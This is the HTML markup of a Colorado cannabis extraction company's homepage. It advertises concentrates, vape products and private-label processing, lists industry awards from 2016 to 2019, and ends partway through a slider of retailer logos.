data-animation='slide' data-conditional_play='' data-ids='' data-video_counter='1' data-autoplay='false' data-bg_slider='false' data-slide_height='' data-handle='' data-interval='5' data-class=' av-section-video-bg' data-css_id='' data-scroll_down='' data-control_layout='' data-custom_markup='' data-perma_caption='' data-autoplay_stopper='' data-image_attachment='' data-min_height='0px' data-default-height='28.666666666667' class='avia-slideshow avia-slideshow-1 av-default-height-applied avia-slideshow-featured av-section-video-bg avia-slide-slider ' itemprop="image" itemscope="itemscope" itemtype="https://schema.org/ImageObject" ><ul class='avia-slideshow-inner ' style='padding-bottom: 28.666666666667%;' ><li data-controls='disabled' data-mute='1' data-loop='1' data-disable-autoplay='' data-video-ratio='3.4883720930233' class=' av-video-slide av-video-service-youtube av-hide-video-controls av-mute-video av-loop-video av-single-slide slide-1 ' ><div data-rel='slideshow-1' class='avia-slide-wrap ' ><div class='av-click-overlay'></div><div class='mejs-mediaelement'><div height='1600' width='900' class='av_youtube_frame' id='player_25_86460350_967697476' data-autoplay='0' data-videoid='nuOyr91FhwI' data-hd='1' data-rel='0' data-wmode='opaque' data-playlist='player_25_86460350_967697476' data-loop='0' data-version='3' data-autohide='1' data-color='white' data-controls='0' data-showinfo='0' data-iv_load_policy='3' data-original_url='https://youtu.be/nuOyr91FhwI' ></div></div><div class='av-click-to-play-overlay'><div class="avia_playpause_icon"></div></div></div></li></ul></div><div class='av-section-color-overlay-wrap'><a href='#next-section' title='' class='scroll-down-link ' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'></a><div class='container' ><main role="main" itemprop="mainContentOfPage" class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-25'><div class='entry-content-wrapper clearfix'> </div></div></main><!-- close content main element --></div></div></div><div id='av_section_2' class='avia-section main_color avia-section-no-padding avia-no-border-styling avia-bg-style-parallax avia-builder-el-1 el_after_av_section el_before_av_layout_row av-desktop-hide av-minimum-height av-minimum-height-custom container_wrap fullsize' style='background-color: #ffffff; ' ><div class='container' style='height:250px'><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-25'><div class='entry-content-wrapper clearfix'> <div style='height:1px; margin-top:-1px' class='hr hr-invisible av-desktop-hide av-medium-hide avia-builder-el-2 el_before_av_heading avia-builder-el-first '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div style='padding-bottom:5px; ' class='av-special-heading av-special-heading-h1 blockquote modern-quote modern-centered avia-builder-el-3 el_after_av_hr el_before_av_hr '><h1 class='av-special-heading-tag ' itemprop="headline" >The new standard in cannabis refinement <span class='special_amp'>&amp;</span> technology.</h1><div class='special-heading-border'><div class='special-heading-inner-border' ></div></div></div> <div class='hr hr-short hr-center av-desktop-hide av-medium-hide avia-builder-el-4 el_after_av_heading avia-builder-el-last '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> </div></div></div><!-- close content main div --></div></div><div id='av-layout-grid-1' class='av-layout-grid-container entry-content-wrapper main_color av-flex-cells av-medium-hide av-small-hide av-mini-hide avia-builder-el-5 el_after_av_section el_before_av_layout_row submenu-not-first container_wrap fullsize' style=' ' > <div class="flex_cell no_margin av_one_half avia-builder-el-6 el_before_av_cell_one_half avia-builder-el-first av-zero-padding " style='vertical-align:middle; padding:0px; '><div class='flex_cell_inner' > <div class='flex_column_table av-equal-height-column-flextable -flextable' ><div class="flex_column av_one_full no_margin flex_column_table_cell av-equal-height-column av-align-middle first avia-builder-el-7 avia-builder-el-no-sibling " style='background: #ffffff; padding:30px; background-color:#ffffff; border-radius:0px; '><div style='padding-bottom:10px; margin:20 20 20 20; font-size:48px;' class='av-special-heading av-special-heading-h3 blockquote modern-quote avia-builder-el-8 el_before_av_hr avia-builder-el-first av-inherit-size av-medium-hide av-small-hide'><h3 class='av-special-heading-tag av-medium-font-size-overwrite av-medium-font-size-30 av-small-font-size-overwrite av-small-font-size-30 av-mini-font-size-overwrite av-mini-font-size-40' itemprop="headline" >EXTRACTION <span class='special_amp'>&amp;</span> CANNABINOID REFINEMENT</h3><div class='special-heading-border'><div class='special-heading-inner-border' ></div></div></div> <div style='height:1px; margin-top:-5px' class='hr hr-invisible av-medium-hide av-small-hide av-mini-hide avia-builder-el-9 el_after_av_heading el_before_av_textblock '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' style='font-size:20px; ' itemprop="text" ><h6>Concentrate Supply Co.<b>™</b> is an industry leader in providing cannabis extractions of the highest quality. Our award-winning line of vape products &#038; concentrates have been the go-to choice for thousands of consumers in Colorado.</h6> </div></section></div></div><!--close column table wrapper. Autoclose: 1 --></div></div><div class="flex_cell no_margin av_one_half avia-builder-el-11 el_after_av_cell_one_half avia-builder-el-last av-zero-padding " style='vertical-align:middle; padding:0px; '><div class='flex_cell_inner' > <div class='avia-image-container avia_animated_image avia_animate_when_almost_visible right-to-left av-styling-no-styling avia-builder-el-12 avia-builder-el-no-sibling avia-align-center ' itemprop="image" itemscope="itemscope" itemtype="https://schema.org/ImageObject" ><div class='avia-image-container-inner'><div class='avia-image-overlay-wrap'><img class='avia_image' src='https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-10-12-at-12.28.44-PM-2.png' alt='' title='Screen Shot 2017-10-12 at 12.28.44 PM' height="768" width="1024" itemprop="thumbnailUrl" /></div></div></div> </div></div> </div> <div id='av-layout-grid-2' class='av-layout-grid-container entry-content-wrapper main_color av-flex-cells av-desktop-hide avia-builder-el-13 el_after_av_layout_row el_before_av_layout_row submenu-not-first container_wrap fullsize' style=' ' > <div class="flex_cell no_margin av_one_half avia-builder-el-14 el_before_av_cell_one_half avia-builder-el-first av-zero-padding " style='vertical-align:middle; padding:0px; '><div class='flex_cell_inner' > <div class='avia-image-container avia_animated_image avia_animate_when_almost_visible right-to-left av-styling-no-styling avia-builder-el-15 avia-builder-el-no-sibling avia-align-center ' itemprop="image" itemscope="itemscope" itemtype="https://schema.org/ImageObject" ><div class='avia-image-container-inner'><div class='avia-image-overlay-wrap'><img class='avia_image' src='https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-10-12-at-12.28.44-PM-2.png' alt='' title='Screen Shot 2017-10-12 at 12.28.44 PM' height="768" width="1024" itemprop="thumbnailUrl" /></div></div></div> </div></div><div class="flex_cell no_margin av_one_half avia-builder-el-16 el_after_av_cell_one_half avia-builder-el-last av-zero-padding " style='vertical-align:middle; padding:0px; '><div class='flex_cell_inner' > <div class='flex_column_table av-equal-height-column-flextable -flextable' ><div class="flex_column av_one_full flex_column_table_cell av-equal-height-column av-align-middle first avia-builder-el-17 avia-builder-el-no-sibling " style='background: #ffffff; padding:30px; background-color:#ffffff; border-radius:0px; '><div style='padding-bottom:10px; font-size:48px;' class='av-special-heading av-special-heading-h3 blockquote modern-quote avia-builder-el-18 el_before_av_hr avia-builder-el-first av-inherit-size '><h3 class='av-special-heading-tag av-medium-font-size-overwrite av-medium-font-size-40' itemprop="headline" >EXTRACTION <span class='special_amp'>&amp;</span> CANNABINOID REFINEMENT</h3><div class='special-heading-border'><div class='special-heading-inner-border' ></div></div></div> <div style='height:1px; margin-top:-5px' class='hr hr-invisible av-medium-hide av-small-hide av-mini-hide avia-builder-el-19 el_after_av_heading el_before_av_textblock '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' style='font-size:20px; ' itemprop="text" ><h6>Concentrate Supply Co.<b>™</b> is an industry leader in providing cannabis extractions of the highest quality. Our award-winning line of vape products &#038; concentrates have been the go-to choice for thousands of consumers in Colorado.</h6> </div></section></div></div><!--close column table wrapper. Autoclose: 1 --></div></div> </div> <div id='av-layout-grid-3' class='av-layout-grid-container entry-content-wrapper main_color av-flex-cells avia-builder-el-21 el_after_av_layout_row el_before_av_layout_row submenu-not-first container_wrap fullsize' style=' ' > <div class="flex_cell no_margin av_one_half avia-builder-el-22 el_before_av_cell_one_half avia-builder-el-first av-zero-padding " style='vertical-align:middle; padding:0px; '><div class='flex_cell_inner' > <div class='avia-image-container avia_animated_image avia_animate_when_almost_visible right-to-left av-styling-no-styling avia-builder-el-23 avia-builder-el-no-sibling avia-align-center ' itemprop="image" itemscope="itemscope" itemtype="https://schema.org/ImageObject" ><div class='avia-image-container-inner'><div class='avia-image-overlay-wrap'><img class='avia_image' src='https://concentratesupplyco.com/wp-content/uploads/2017/10/OJGhost15.png' alt='' title='OJGhost15' height="1278" width="1876" itemprop="thumbnailUrl" /></div></div></div> </div></div><div class="flex_cell no_margin av_one_half avia-builder-el-24 el_after_av_cell_one_half avia-builder-el-last av-zero-padding " style='vertical-align:middle; padding:0px; '><div class='flex_cell_inner' > <div class='flex_column_table av-equal-height-column-flextable -flextable' ><div class="flex_column av_one_full flex_column_table_cell av-equal-height-column av-align-middle first avia-builder-el-25 avia-builder-el-no-sibling " style='background: #ffffff; padding:30px; background-color:#ffffff; border-radius:0px; '><div style='padding-bottom:10px; font-size:45px;' class='av-special-heading av-special-heading-h3 blockquote modern-quote avia-builder-el-26 el_before_av_hr avia-builder-el-first av-inherit-size '><h3 class='av-special-heading-tag ' itemprop="headline" >PRIVATE LABEL PROCESSING</h3><div class='special-heading-border'><div class='special-heading-inner-border' ></div></div></div> <div style='height:10px' class='hr hr-invisible avia-builder-el-27 el_after_av_heading el_before_av_textblock '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' style='font-size:20px; ' itemprop="text" ><h6>We offer private label processing at extremely competitive rates. With CSC, you can expect prompt communication, efficient turn-around times &#038; most importantly, a quality product.</p> <p>Products include both cured &#038; live resin, solventless extractions(fullmelt &#038; rosin) &#038; distillate products.</p> <p>Bulk discounts available.</h6> </div></section> <section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' style='font-size:15px; ' itemprop="text" ><p><a href="https://concentratesupplyco.com/contact/">Contact Us</a></p> </div></section></div></div><!--close column table wrapper. Autoclose: 1 --></div></div> </div> <div id='av-layout-grid-4' class='av-layout-grid-container entry-content-wrapper main_color av-flex-cells avia-builder-el-30 el_after_av_layout_row el_before_av_section submenu-not-first container_wrap fullsize' style=' ' > <div class="flex_cell no_margin av_one_third avia-builder-el-31 el_before_av_cell_one_third avia-builder-el-first av-zero-padding " style='background: #ffffff; vertical-align:middle; padding:0px; background-color:#ffffff; '><div class='flex_cell_inner' > <div class='avia-image-container av-styling-no-styling avia-builder-el-32 avia-builder-el-no-sibling avia-align-center ' itemprop="image" itemscope="itemscope" itemtype="https://schema.org/ImageObject" ><div class='avia-image-container-inner'><div class='avia-image-overlay-wrap'><a href='https://concentratesupplyco.com/products/distillateproducts/' class='avia_image' ><img class='avia_image ' src='https://concentratesupplyco.com/wp-content/uploads/2018/01/GameChangerAdvertisement.png' alt='' title='GameChangerAdvertisement' itemprop="thumbnailUrl" /></a></div></div></div> </div></div><div class="flex_cell no_margin av_one_third avia-builder-el-33 el_after_av_cell_one_third el_before_av_cell_one_third av-zero-padding " style='background: #f7f7f7; vertical-align:middle; padding:0px; background-color:#f7f7f7; '><div class='flex_cell_inner' > <div style='height:30px' class='hr hr-invisible av-desktop-hide avia-builder-el-34 el_before_av_font_icon avia-builder-el-first '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <span class="av_font_icon avia_animate_when_visible avia-icon-animate av-icon-style-border av-no-color avia-icon-pos-center " style=""><span class='av-icon-char' style='font-size:40px;line-height:40px;width:40px;' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello' ></span></span> <div style='height:40px' class='hr hr-invisible av-medium-hide av-small-hide av-mini-hide avia-builder-el-36 el_after_av_font_icon el_before_av_headline_rotator '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div style='text-align:center; font-size:40px; margin:0 0 0 0; ' class='av-rotator-container av-rotation-container-center av-medium-hide av-small-hide av-mini-hide avia-builder-el-37 el_after_av_hr el_before_av_headline_rotator av-fixed-rotator-width' data-interval='3' data-animation='1' data-fixWidth='1'><h2 class='av-rotator-container-inner '><span class='av-rotator-text av-rotator-multiline-off '> <span class='av-rotator-text-single av-rotator-text-single-1'>innovating</span> <span class='av-rotator-text-single av-rotator-text-single-2'>improving others</span> <span class='av-rotator-text-single av-rotator-text-single-3'>seeking the best</span> <span class='av-rotator-text-single av-rotator-text-single-4'>pushing limits</span> <span class='av-rotator-text-single av-rotator-text-single-5'>exceeding goals</span> </span></h2></div> <div style='text-align:center; font-size:40px; margin:0 0 0 0; ' class='av-rotator-container av-rotation-container-center av-desktop-hide avia-builder-el-38 el_after_av_headline_rotator el_before_av_hr av-fixed-rotator-width' data-interval='3' data-animation='1' data-fixWidth='1'><h2 class='av-rotator-container-inner '><span class='av-rotator-text av-rotator-multiline-on '> <span class='av-rotator-text-single av-rotator-text-single-1'>Join Our Team</span> </span></h2></div> <div style='height:30px' class='hr hr-invisible av-desktop-hide avia-builder-el-39 el_after_av_headline_rotator el_before_av_button '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div class='avia-button-wrap avia-button-center avia-builder-el-40 el_after_av_hr el_before_av_hr '><a href='mailto:[email protected]' class='avia-button av-desktop-hide avia-icon_select-no avia-color-dark avia-size-medium avia-position-center ' ><span class='avia_iconbox_title' >APPLY NOW</span></a></div> <div style='height:40px' class='hr hr-invisible avia-builder-el-41 el_after_av_button el_before_av_button '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div class='avia-button-wrap avia-button-center avia-builder-el-42 el_after_av_hr avia-builder-el-last '><a href='mailto:[email protected]' class='avia-button av-medium-hide av-small-hide av-mini-hide avia-icon_select-no avia-color-dark avia-size-large avia-position-center ' ><span class='avia_iconbox_title' >APPLY NOW</span></a></div> </div></div><div class="flex_cell no_margin av_one_third avia-builder-el-43 el_after_av_cell_one_third avia-builder-el-last av-zero-padding " style='background: #ffffff; vertical-align:middle; padding:0px; background-color:#ffffff; '><div class='flex_cell_inner' > <div style='height:40px' class='hr hr-invisible avia-builder-el-44 el_before_av_image avia-builder-el-first '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div class='avia-image-container av-styling- avia-builder-el-45 el_after_av_hr el_before_av_hr avia-align-center ' itemprop="image" itemscope="itemscope" itemtype="https://schema.org/ImageObject" ><div class='avia-image-container-inner'><div class='avia-image-overlay-wrap'><img class='avia_image' src='https://concentratesupplyco.com/wp-content/uploads/2017/08/LeafLink-Color.jpg' alt='' title='LeafLink-Color' height="669" width="2529" itemprop="thumbnailUrl" /></div></div></div> <div style='height:40px' class='hr hr-invisible avia-builder-el-46 el_after_av_image el_before_av_textblock '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <section class="av_textblock_section " itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' itemprop="text" ><h3 style="text-align: center;">Licensed in Colorado?<br /> Order products in a snap!</h3> </div></section> <div style='height:40px' class='hr hr-invisible avia-builder-el-48 el_after_av_textblock el_before_av_button '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div class='avia-button-wrap avia-button-center avia-builder-el-49 el_after_av_hr avia-builder-el-last '><a href='http://www.leaflink.com' class='avia-button avia-icon_select-no avia-color-dark avia-size-medium avia-position-center ' ><span class='avia_iconbox_title' >RESERVE ONLINE</span></a></div> </div></div> </div> <div id='av_section_3' class='avia-section main_color avia-section-default avia-no-border-styling avia-bg-style-scroll avia-builder-el-50 el_after_av_layout_row el_before_av_section container_wrap fullsize' style=' ' ><div class='container' ><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-25'><div class='entry-content-wrapper clearfix'> <div style='padding-bottom:10px; ' class='av-special-heading av-special-heading-h2 blockquote modern-quote modern-centered avia-builder-el-51 el_before_av_hr avia-builder-el-first '><h2 class='av-special-heading-tag ' itemprop="headline" >Awards <span class='special_amp'>&amp;</span> Recognition</h2><div class='special-heading-border'><div class='special-heading-inner-border' ></div></div></div> <div style='height:20px' class='hr hr-invisible avia-builder-el-52 el_after_av_heading el_before_av_textblock '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <section class="av_textblock_section av-mini-hide" itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' style='font-size:17px; ' itemprop="text" ><h3 style="text-align: center;"><strong>2016 Colorado High Times Cannabis Cup Colorado</strong><span class="m_-8846079816063475365gmail-Apple-converted-space"> &#8211; Best Sativa Concentrate (Bloody Banana Split)</span></h3> <h3 style="text-align: center;"><strong>2017 Rooster Magazine THC Classic</strong> &#8211; 1st Place, Shatter (GG4 by Lama Brand Cannabis)</h3> <h3></h3> <h3 style="text-align: center;"><strong>2017 Dope Cup</strong> &#8211; Best Oil (Clementine Vape Cartridge)</h3> <h3 style="text-align: center;"><strong>2017 The Hemp Con Championship</strong> &#8211; 2nd Place, Solventless (Witches Weed by Lama Brand Cannabis)</h3> <h3 style="text-align: center;"><strong>2017 Sacred Seed Terp Trials</strong> &#8211; 1st Place (Flo x Vanilla Kush)</h3> <h3 style="text-align: center;"><strong>2018 Rooster Magazine THC Classic</strong> &#8211; 2nd Place, Shatter (OG Medley by Lama Brand Cannabis)</h3> <h3 style="text-align: center;"><strong>2018 Rooster Magazine 710 Showdown</strong> &#8211; 3rd Place, Shatter (OG Medley by Lama Brand Cannabis)</h3> <h3 style="text-align: center;"><strong>2018 Rooster Magazine 710 Showdown</strong> &#8211; 3rd Place, Sauce (Skunkberry)</h3> <h3 style="text-align: center;"><strong>2019 Rooster Magazine THC Classic</strong> &#8211; 1st Place, Shatter (Ghost Train Haze by High West Cannabis)</h3> </div></section> <section class="av_textblock_section av-desktop-hide av-medium-hide av-small-hide" itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_textblock ' style='font-size:17px; ' itemprop="text" ><h6 style="text-align: center;"><strong>2016 Colorado High Times Cannabis Cup Colorado</strong><span class="m_-8846079816063475365gmail-Apple-converted-space"> &#8211; Best Sativa Concentrate (Bloody Banana Split)</span></h6> <h6 style="text-align: center;"><strong>2017 Rooster Magazine THC Classic</strong> &#8211; 1st Place, Shatter (GG4 by Lama Brand Cannabis)</h6> <h6 style="text-align: center;"><strong>2017 Dope Cup</strong> &#8211; Best Oil (Clementine Vape Cartridge)</h6> <h6 style="text-align: center;"><strong>2017 The Hemp Con Championship</strong> &#8211; 2nd Place, Solventless (Witches Weed by Lama Brand Cannabis)</h6> <h6 style="text-align: center;"><strong>2017 Sacred Seed Terp Trials</strong> &#8211; 1st Place (Flo x Vanilla Kush)</h6> <h6 style="text-align: center;"><strong>2018 Rooster Magazine THC Classic</strong> &#8211; 2nd Place, Shatter (OG Medley by Lama Brand Cannabis)</h6> <h6 style="text-align: center;"><strong>2018 Rooster Magazine 710 Showdown</strong> &#8211; 3rd Place, Shatter (OG Medley by Lama Brand Cannabis)</h6> <h6 style="text-align: center;"><strong>2018 Rooster Magazine 710 Showdown</strong> &#8211; 3rd Place, Sauce (Skunkberry)</h6> <h6 style="text-align: center;"><strong>2019 Rooster Magazine THC Classic</strong> &#8211; 1st Place, Shatter (Ghost Train Haze by High West Cannabis)</h6> </div></section> </div></div></div><!-- close content main div --></div></div><div id='av_section_4' class='avia-section main_color avia-section-no-padding avia-no-border-styling avia-bg-style-scroll avia-builder-el-55 el_after_av_section el_before_av_partner container_wrap fullsize' style='background-color: #000000; ' ><div class='container' ><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-25'><div class='entry-content-wrapper clearfix'> <div class="flex_column av_two_third flex_column_div av-zero-column-padding first avia-builder-el-56 el_before_av_one_third avia-builder-el-first " style='border-radius:0px; '><div style='height:25px' class='hr hr-invisible av-desktop-hide avia-builder-el-57 el_before_av_image avia-builder-el-first '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div class='avia-image-container av-styling-no-styling avia-builder-el-58 el_after_av_hr avia-builder-el-last avia-align-center ' itemprop="image" itemscope="itemscope" itemtype="https://schema.org/ImageObject" ><div class='avia-image-container-inner'><div class='avia-image-overlay-wrap'><img class='avia_image' src='https://concentratesupplyco.com/wp-content/uploads/2018/05/DŌSD-BlackCherryNanoBites.png' alt='' title='DŌSD-BlackCherryNanoBites' height="1140" width="1708" itemprop="thumbnailUrl" /></div></div></div></div><div class="flex_column av_one_third flex_column_div av-zero-column-padding avia-builder-el-59 el_after_av_two_third avia-builder-el-last " style='border-radius:0px; '><div style='height:50px' class='hr hr-invisible av-medium-hide av-small-hide av-mini-hide avia-builder-el-60 el_before_av_hr avia-builder-el-first '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div style='height:50px' class='hr hr-invisible av-medium-hide av-small-hide av-mini-hide avia-builder-el-61 el_after_av_hr el_before_av_heading '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div style='padding-bottom:5px; color:#ffffff;font-size:45px;' class='av-special-heading av-special-heading-h3 custom-color-heading blockquote modern-quote modern-centered avia-builder-el-62 el_after_av_hr el_before_av_hr av-inherit-size '><h3 class='av-special-heading-tag av-medium-font-size-overwrite av-medium-font-size-40 av-small-font-size-overwrite av-small-font-size-34' itemprop="headline" >no time to wait.</h3><div class ='av-subheading av-subheading_below av_custom_color ' style='font-size:15px;'><p>Introducing NanoBites<br /> by DŌSD Edibles</p> </div><div class='special-heading-border'><div class='special-heading-inner-border' style='border-color:#ffffff'></div></div></div> <div style='height:20px' class='hr hr-invisible avia-builder-el-63 el_after_av_heading el_before_av_hr '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div style='height:20px' class='hr hr-invisible av-medium-hide av-small-hide av-mini-hide avia-builder-el-64 el_after_av_hr el_before_av_button '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div> <div class='avia-button-wrap avia-button-center avia-builder-el-65 el_after_av_hr el_before_av_hr '><a href='http://www.dosdedibles.com' class='avia-button avia-icon_select-no avia-color-light avia-size-medium avia-position-center ' target="_blank" ><span class='avia_iconbox_title' >LEARN MORE</span></a></div> <div style='height:50px' class='hr hr-invisible avia-builder-el-66 el_after_av_button avia-builder-el-last '><span class='hr-inner ' ><span class='hr-inner-style'></span></span></div></div> </div></div></div><!-- close content main div --></div></div><div id='after_section_4' class='main_color av_default_container_wrap container_wrap fullsize' style=' ' ><div class='container' ><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-25'><div class='entry-content-wrapper clearfix'> <div data-autoplay='true' data-interval='4' data-animation='slide' class='avia-logo-element-container av-border-deactivate avia-logo-slider avia-content-slider avia-smallarrow-slider avia-content-slider-active noHover avia-content-slider1 avia-content-slider-even avia-builder-el-67 el_after_av_section el_before_av_codeblock avia-builder-el-first ' ><div class='avia-smallarrow-slider-heading '><div class='new-special-heading'><h3 class=''>CURRENT RETAILERS</h3></div><div class='avia-slideshow-arrows avia-slideshow-controls'><a href='#prev' class='prev-slide' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'>Previous</a><a href='#next' class='next-slide' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'>Next</a></div></div><div class='avia-content-slider-inner'><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-1 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/03/TheFarm-Gold-Logo-2-1.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-2 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/large_1504203985-large_1503530955-large_ACALogoTrim-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-3 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/altitude.dispensary.logo_.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-4 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/13840.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-5 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_Honey_Cellar_logo_art-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-6 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/d4aa00335ea5ac87c7757e27b70983e7-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-7 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-09-07-at-11.13.35-PM-1-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-8 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_Den_rec_green_bar_logo-450x450.jpg);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-9 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/just-logo-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-10 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/green-dream-logo.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-11 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_4-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-12 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Lightshade-sun.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-13 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/starbuds-2.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-14 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/drift.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-15 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_Might_Tree_logo-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-16 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_Sacred_Seed_MAIN-450x450.jpg);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-17 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-09-07-at-11.10.42-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-18 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/fdsfsdggg-1-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-19 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_IMG_0776-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-20 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/k0JvQoqK-1.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-21 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/TrillAlternatives-1-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-22 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_THC_Logo.2-1-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-23 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' 